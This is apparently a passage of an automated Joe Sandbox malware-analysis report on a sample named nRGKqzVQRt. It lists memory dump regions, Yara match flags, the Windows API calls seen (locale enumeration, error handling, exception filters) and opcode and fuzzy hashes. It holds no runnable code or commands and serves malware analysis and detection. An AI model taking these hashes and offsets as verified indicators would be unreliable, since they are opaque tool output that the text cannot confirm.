                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$InfoLocale
                                                  • String ID:
                                                  • API String ID: 3736152602-0
                                                  • Opcode ID: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                  • Instruction ID: af8208fef9ccbc3ebb1189a9801eca2b58f992e2e20505336eac0b5ebe102a99
                                                  • Opcode Fuzzy Hash: 1139729f0d8f3faab7eaca461a639108405b5028be2395062180b67052449781
                                                  • Instruction Fuzzy Hash: 30F0F932600111BBDF286764C816BFB775EEB41754F144629EC16A7280EA70FE43C790
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • EnumSystemLocalesW.KERNEL32(004214F9,00000001,00000001,?,-00000050,?,00421898,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00421265
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                  • Instruction ID: 14f67bad7a4cfcfa4ee4bc3d5db6401a72568cf36d7e4a3035cac00d244dbeff
                                                  • Opcode Fuzzy Hash: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                  • Instruction Fuzzy Hash: 92F04C323003049FDB245F35EC81B7B7B95FF80368B44446EF605876A0C6B55C42C614
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • EnumSystemLocalesW.KERNEL32(004214F9,00000001,00000001,?,-00000050,?,00681AFF,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 006814CC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                  • Instruction ID: befc5e2cf079742bf303289a400f452b67162b4b0a4b9efcf49f20a3038d3b4c
                                                  • Opcode Fuzzy Hash: 6fac6c021882376c9bbe75fd1d3f35105e289d3445d4e4c8521c9975bb8101d4
                                                  • Instruction Fuzzy Hash: E3F0F6363003045FDB246F79D881ABA7BDAEF81768B15852DFA494B690C6B1AC03C754
                                                  APIs
                                                    • Part of subcall function 00414FA9: EnterCriticalSection.KERNEL32(?,?,004165C0,00000000,00435520,0000000C,00416587,?,?,004196BE,?,?,00418FC5,00000001,00000364,00000008), ref: 00414FB8
                                                  • EnumSystemLocalesW.KERNEL32(00419722,00000001,004356C0,0000000C,00419AF0,00000000), ref: 00419767
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                  • Instruction ID: cedf4b0542652410236bfbe7b93f0e3d125763c36bf37d7ca1942f65020527f8
                                                  • Opcode Fuzzy Hash: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                  • Instruction Fuzzy Hash: AEF03276A14204DFE714EF98E852B9CB7B0EB48725F20402FF5189B2E0CB7999808F58
                                                  APIs
                                                    • Part of subcall function 00675210: RtlEnterCriticalSection.NTDLL(?), ref: 0067521F
                                                  • EnumSystemLocalesW.KERNEL32(00419722,00000001,004356C0,0000000C,00679D57,00000000), ref: 006799CE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                  • String ID:
                                                  • API String ID: 1272433827-0
                                                  • Opcode ID: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                  • Instruction ID: bddadfd8115f4718261273de2d7eb7560bb9d2fde17cc9b66a24f0501797fd25
                                                  • Opcode Fuzzy Hash: 68f9fd4353d092257d8faacbfb28b6082a3244547ec3c47aa70ea1475b86d789
                                                  • Instruction Fuzzy Hash: ACF04972A14704DFD714EF98E842B9D77F1EB08761F20812EF5189B2E0DB795A508F98
                                                  APIs
                                                    • Part of subcall function 00418E23: GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,7622DF80,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418E28
                                                    • Part of subcall function 00418E23: SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,7622DF80,00000000,00000000,00401E98), ref: 00418EC6
                                                  • EnumSystemLocalesW.KERNEL32(0042108E,00000001,00000001,?,?,004218F6,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0042116C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                  • Instruction ID: e5017fa5d0c691943728d275092cb8a263cd523bacd6dc2a7f3d241a18a3b7dc
                                                  • Opcode Fuzzy Hash: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                  • Instruction Fuzzy Hash: 6CF0553A30020557CB149F39E84577A7FA0EFC5714B46405EEB098B2A0C6799883C798
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
                                                    • Part of subcall function 0067908A: SetLastError.KERNEL32(00000000,00437188,000000FF,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067912D
                                                  • EnumSystemLocalesW.KERNEL32(0042108E,00000001,00000001,?,?,00681B5D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 006813D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                  • String ID:
                                                  • API String ID: 2417226690-0
                                                  • Opcode ID: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                  • Instruction ID: 4042fd14f2a5aced0f840ce824eab6dfe11e15cfd280f12b90e84d954bd42b69
                                                  • Opcode Fuzzy Hash: 8bb4e4ca8e02dc3f9042754c392158079bf37807a7981d48a91552c6d213624d
                                                  • Instruction Fuzzy Hash: 2FF0553630020457CB14AF35D845BAA7F95EFC2710B46805CEA098BA90C6B29883C7A4
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0041857E,?,20001004,00000000,00000002,?,?,00417B8B), ref: 00419C28
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: fbb0bd12f0dadb61687aff6c97eb42df5c7e0ff724206f946788ad3c9e0e9366
                                                  • Instruction ID: 917ba661290b8a4deb7db836a8ac3b69315417969e7b9d4f32c12ff31b6cd56c
                                                  • Opcode Fuzzy Hash: fbb0bd12f0dadb61687aff6c97eb42df5c7e0ff724206f946788ad3c9e0e9366
                                                  • Instruction Fuzzy Hash: 8FE0DF3110411CBBCF123F21EC04EEE3F5AEF44720F004026FC0022261CB358DA2AAD9
                                                  APIs
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,006787E5,?,20001004,00000000,00000002,?,?,00677DF2), ref: 00679E8F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoLocale
                                                  • String ID:
                                                  • API String ID: 2299586839-0
                                                  • Opcode ID: 8ec4a8ccac36f94d5fb742d1bdb748f86e068ed4b8c627be13f1f3e7e8dff0aa
                                                  • Instruction ID: 68372baff9600b7b2a4091415fb8c62be8d053b33f7173e75160a409050dc476
                                                  • Opcode Fuzzy Hash: 8ec4a8ccac36f94d5fb742d1bdb748f86e068ed4b8c627be13f1f3e7e8dff0aa
                                                  • Instruction Fuzzy Hash: 86E04F31601218BBDF126F60DC09EAE3E5BEF44760F048024FC0D65260DF328D22AAE9
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000D955,0040D4EB), ref: 0040D94E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                  • Instruction ID: cde6de7be7cd455b3e18df9ee2833f47d38776692af0ef052807f8dbc91abbb5
                                                  • Opcode Fuzzy Hash: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                  • Instruction Fuzzy Hash:
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(0040D955,0066D752), ref: 0066DBB5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                  • Instruction ID: cde6de7be7cd455b3e18df9ee2833f47d38776692af0ef052807f8dbc91abbb5
                                                  • Opcode Fuzzy Hash: b73b18c2883fa670bc28fd0acd32dc49c2a2e8011cf96bc56f1885a87c73584c
                                                  • Instruction Fuzzy Hash:
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                  • Instruction ID: 760798cd14c0c86bed722a4dd279e5522f8c51e663d9525b9623c5e101cee0d5
                                                  • Opcode Fuzzy Hash: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                  • Instruction Fuzzy Hash: 9F51357020064876DB388A289BE67FF679B9B16308F54041FD486D73C1D6DD9DE6820E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                  • Instruction ID: 853e48f0d740310cc3a7760be4e74d6cb6a6f8b251400cc0940caf2d61d52f37
                                                  • Opcode Fuzzy Hash: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                  • Instruction Fuzzy Hash: 5F51777060064996EB3CAA2D8B957FFA799AB01304F14011FD892D73D1D6DC9EF6831E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                  • Instruction ID: 7700cefd5ace0153d29583424536392770ba0143e7ce1186a80b9605355a9dba
                                                  • Opcode Fuzzy Hash: 1fc4deea30514db6efda5df0b740ecca165293c82dec24950a60051fffaab4b4
                                                  • Instruction Fuzzy Hash: E551DB3060068B56DF388A3988B57FE779B9F11704F18C41ED98EE7382D611DE85D315
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0
                                                  • API String ID: 0-4108050209
                                                  • Opcode ID: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                  • Instruction ID: 9e7a4b8286590e18e731435ec7cb7483bf0fd8731221add620d585f407e09ad6
                                                  • Opcode Fuzzy Hash: c5c8dbf5b4fb1670501ceb7a0f778742789bb98c06569b54fb283640721c15f6
                                                  • Instruction Fuzzy Hash: 9E51387060074B5ADB3C8A2C89B57FE679BAF52300F18C51ED88EDB382D612DE4D9257
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: uTB
                                                  • API String ID: 0-3950955333
                                                  • Opcode ID: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                  • Instruction ID: feb5b225c8a083bfb470cfa5e0dae61ad3f57a9261c2ea5476071e4c46a7d3ba
                                                  • Opcode Fuzzy Hash: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                  • Instruction Fuzzy Hash: 3C21B673F20539477B0CC47E8C5227DB6E1D78C501745423EF8A6EA2C1D968D917E2E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604082377.000000000076F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0076F000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_76f000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: pCw
                                                  • API String ID: 0-3196406043
                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction ID: a85045274d48d28c8ce328669d6906ebec8b1e7313b4a5a92ae3c5f5948c46f5
                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction Fuzzy Hash: BD118B72340100AFDB54DF59DC81FA673EAEB89360B2980A5ED08CB316E779EC02C760
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7394599106bb57588a7fcc5f2a316000e217cfd668e3a351bfa2c2c00aeffec0
                                                  • Instruction ID: d0e7df19af42a2597c1c9a0a4d59ec128da6f77e801e7a5f5831370ed6b1a342
                                                  • Opcode Fuzzy Hash: 7394599106bb57588a7fcc5f2a316000e217cfd668e3a351bfa2c2c00aeffec0
                                                  • Instruction Fuzzy Hash: 50321672E65F014DD7239634C86233A6249AFB73C4F55D737F81AB5AA5EB29C4C34104
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                  • Instruction ID: 62ddf0f539a61fe362f3fc0ba911e904fc0541fcde171f6a6d6dbec24995197b
                                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                  • Instruction Fuzzy Hash: CDC19473D0E5F3469B35452D055823FEEA26E81B4132FC3D6DCD03F28AC62A6D01A6D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                  • Instruction ID: 25b8650a2cf9ca21f7bb2be8a46dff98435e19c08d2377397bd677c178433d5c
                                                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                  • Instruction Fuzzy Hash: E7C1B473D1A5F386DB35452D051823FEE626E91B4132FC396CCD03F39AD62A6D01A6D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                  • Instruction ID: 5fe4683abeec6dd53c9186c9ea3dba8c7b2ddbb973b4a3a3d525454f4ced2ac3
                                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                  • Instruction Fuzzy Hash: F8C19333D0F5F2879B36452D451823FEE616E81B4132F8396CCD03F69AD62A6D06A6D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                  • String ID:
                                                  • API String ID: 4283097504-0
                                                  • Opcode ID: 9637478f7503b63ea53ab8483ff2b13938b4887820308a3a1b22a451d918574a
                                                  • Instruction ID: c11220bdc84f0dd27eb771944182a56a06f2eba990a86c6701f9ca16453aea29
                                                  • Opcode Fuzzy Hash: 9637478f7503b63ea53ab8483ff2b13938b4887820308a3a1b22a451d918574a
                                                  • Instruction Fuzzy Hash: 6CB128756007118BDB389B65DCC2AB7B3E9EF54308F94452FE983C6642E678F986C708
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                  • String ID:
                                                  • API String ID: 4283097504-0
                                                  • Opcode ID: bc8b9a7b4de513b6833ccc6202e639fa52809b2a80a517f60166b00b34b4851b
                                                  • Instruction ID: b83771c7a0ba9639ca14f99d62c0474ad4c155d5f713e813a7bf6e50a00cdd28
                                                  • Opcode Fuzzy Hash: bc8b9a7b4de513b6833ccc6202e639fa52809b2a80a517f60166b00b34b4851b
                                                  • Instruction Fuzzy Hash: 69B12B755007019FEB78AF24CC92AF7B3EAEF44304F144E6DEA87C6640EA75A989C714
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                  • Instruction ID: 4a5650e53ad3b194ac431d657283c2806adc1ad088b25dc02e29fa1ee6cafad7
                                                  • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                  • Instruction Fuzzy Hash: 0BB19533D0A4F346A775452D051823FEE626E91B4032FC3D6DCD03F68ADA2A6D05A6D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                  • Instruction ID: c2a6b4ca4ed47aa3f68bd30a03a2ec961b3334928326c202ed327f89064bb833
                                                  • Opcode Fuzzy Hash: 1398ea986535ec3318b79b40c1585fada12e5f417fb6eaadcb28915ff98f2077
                                                  • Instruction Fuzzy Hash: 1921B673F2093947770CC47E8C5627DB6E1C68C601745423EF8A6EA2C1D968D917E2E4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                  • Instruction ID: 54cccbac12d7b0a806302a64698748c03833c4b2bf86144adce5760e1b7c8ced
                                                  • Opcode Fuzzy Hash: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                  • Instruction Fuzzy Hash: 9511A333F30C255A675C81698C172BAA1D2EBD824034F533AD826EB284E9A4DE23D290
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                  • Instruction ID: 227dbde4454c41fa39b0f6d3b3892cc549f560abf996e945d553e775a527903a
                                                  • Opcode Fuzzy Hash: 2251fa8878217747c262d0b2e995b0e33faf766888378a2d5fa78229a167b9b7
                                                  • Instruction Fuzzy Hash: 5511A323F30C255A675C81698C172BAA1D2EBD824034F533ED826E7284E9A4DE13D290
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 1c530e7fa6924d9775cb3f61f4bfdae9f72d3837fde0802971f232fe1001d1b0
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: 22112BF730105183D6A4863FC8B46B7A795FBCA32072C4B7BE1816B7D4D13AE965DA08
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
